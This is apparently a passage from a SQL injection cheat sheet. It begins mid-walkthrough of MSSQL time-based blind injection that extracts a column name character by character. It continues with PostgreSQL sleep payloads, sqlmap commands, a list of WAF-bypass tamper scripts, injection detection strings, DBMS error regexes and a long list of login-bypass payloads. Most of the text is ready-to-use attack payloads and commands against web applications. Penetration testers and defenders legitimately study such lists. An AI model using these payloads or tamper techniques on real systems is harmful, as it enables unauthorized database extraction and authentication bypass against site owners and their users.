http://example.com/page.aspx?id=1; IF (LEN(SELECT TOP 1 column_name from testDB.information_schema.columns where table_name=’Members’)=4) WAITFOR DELAY ’00:00:5′– (+5 seconds)
You can check the length prior you start testing away
http://example.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name=’Members’),1,1)))=117) WAITFOR DELAY ’00:00:5′– (+5 seconds)
http://example.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name=’Members’),1,1)))=115) WAITFOR DELAY ’00:00:5′– (+5 seconds)
http://example.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name=’Members’),1,1)))=51) WAITFOR DELAY ’00:00:5′– (+5 seconds)
http://example.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name=’Members’),1,1)))=114) WAITFOR DELAY ’00:00:5′– (+5 seconds)
Column Name = 117,115,51,114 = user

Postgresql Blind SQLi (Stacked Queries):
id=1; select pg_sleep(5);– –
1; SELECT case when (SELECT current_setting(`is_superuser`))=’on’ then pg_sleep(5) end;– –

8. Blind SQL Injection Exploitation by SQLMap:

sqlmap -r req.txt -v 3 –time-sec=5 –technique=T –current-db
sqlmap -r req.txt -v 3 -p “input parameter” –level=5 –risk=3 –time-sec=5 –technique=T –current-db
sqlmap -r req.txt -v 3 -p “input parameter” –level=5 –risk=3 –time-sec=5 –technique=BT –current-db

9. Blind SQL Injection WAF Bypass (Tamper):

Example:
sqlmap -r req.txt -v 3 -p “input parameter” –level=5 –risk=3 –time-sec=5 –technique=T –tamper=between –current-db
Mysql,Mssql,Postgresql,Oracle (Blind):
between
Mysql (Blind):
ifnull2casewhenisnull
ifnull2ifisnull
Mysql,Mssql,Postgresql,Oracle (Blind):
charencode
Mysql,Mssql,Postgresql (Blind):
charunicodeencode
Mysql (Blind):
commalesslimit
commalessmid
Mysql (Blind):
escapequotes
UTF-8 (Blind):
apostrophemask
overlongutf8
overlongutf8more
Bypass waf in JSON (Blind):
charunicodeescape
Mysql,Postgresql,Oracle (Blind):
greatest
Cloudfare waf (Blind):
xforwardedfor

Quick SQLMap Tamper Suggester:
https://github.com/m4ll0k/Atlas

10. SQL Detection Query (Generic Error):



‘”
.
/
\
%5c
%27
%22
%23
%3B
)
“)
‘)
))
“))
‘))
#
;

`

,
“”
//
\\
%
%00
||
#Detection source:

[“SQL syntax.*MySQL”, “Warning.*mysql_.*”, “valid MySQL result”, “MySqlClient\.”]
[“PostgreSQL.*ERROR”, “Warning.*\Wpg_.*”, “valid PostgreSQL result”, “Npgsql\.”]
[“Driver.* SQL[\-\_\ ]*Server”, “OLE DB.* SQL Server”, “(\W|\A)SQL Server.*Driver”, “Warning.*mssql_.*”, “(\W|\A)SQL Server.*[0-9a-fA-F]{8}”, “(?s)Exception.*\WSystem\.Data\.SqlClient\.”, “(?s)Exception.*\WRoadhouse\.Cms\.”]
[“Microsoft Access Driver”, “JET Database Engine”, “Access Database Engine”]
[“\bORA-[0-9][0-9][0-9][0-9]”, “Oracle error”, “Oracle.*Driver”, “Warning.*\Woci_.*”, “Warning.*\Wora_.*”]
[“CLI Driver.*DB2”, “DB2 SQL error”, “\bdb2_\w+\(“]
[“SQLite/JDBCDriver”, “SQLite.Exception”, “System.Data.SQLite.SQLiteException”, “Warning.*sqlite_.*”, “Warning.*SQLite3::”, “\[SQLITE_ERROR\]”]
[“(?i)Warning.*sybase.*”, “Sybase message”, “Sybase.*Server message.*”]

11. SQL Injection Auth Bypass:

‘=’ ‘or’
‘ or ”=’
/1#\
‘-‘
‘ ‘
‘&’
‘^’
‘*’
‘ or ”-‘
‘ or ” ‘
‘ or ”&’
‘ or ”^’
‘ or ”*’
“-”
” ”
“&”
“^”
“*”
” or “”-”
” or “” ”
” or “”&”
” or “”^”
” or “”*”
or true–
” or true–
‘ or true–
“) or true–
‘) or true–
admin’ —
admin’ #
admin’/*
admin’ or ‘1’=’1
admin’ or ‘1’=’1′–
admin’ or ‘1’=’1’#
admin’or 1=1 or ”=’
admin’ or 1=1
admin’ or 1=1–
admin’ or 1=1#
admin’ or 1=1/*
admin”) or (“1″=”1
admin”) or (“1″=”1″–
admin”) or (“1″=”1″#
admin”) or (“1″=”1″/*
admin”) or “1”=”1
admin”) or “1”=”1″–
admin”) or “1”=”1″#
admin”) or “1”=”1″/*
‘ or ‘x’=’x
‘) or (‘x’)=(‘x
‘)) or ((‘x’))=((‘x
” or “x”=”x
“) or (“x”)=(“x
“)) or ((“x”))=((“x
1’or’1’=’1
or 1=1
or 1=1–
or 1=1#
or 1=1/*
admin’ or ‘1’=’1’/*
admin’) or (‘1’=’1
admin’) or (‘1’=’1′–
admin’) or (‘1’=’1’#
admin’) or (‘1’=’1’/*
admin’) or ‘1’=’1
admin’) or ‘1’=’1′–
admin’) or ‘1’=’1’#
admin’) or ‘1’=’1’/*
admin” —
admin” #
admin”/*
admin” or “1”=”1
admin” or “1”=”1″–
admin” or “1”=”1″#
admin” or “1”=”1″/*
admin”or 1=1 or “”=”
admin” or 1=1
admin” or 1=1–
admin” or 1=1#
admin” or 1=1/*

References :
Blind SQL Injection
https://www.owasp.org/index.php/Blind_SQL_Injection

Leave a Reply

Your email address will not be published. Required fields are marked *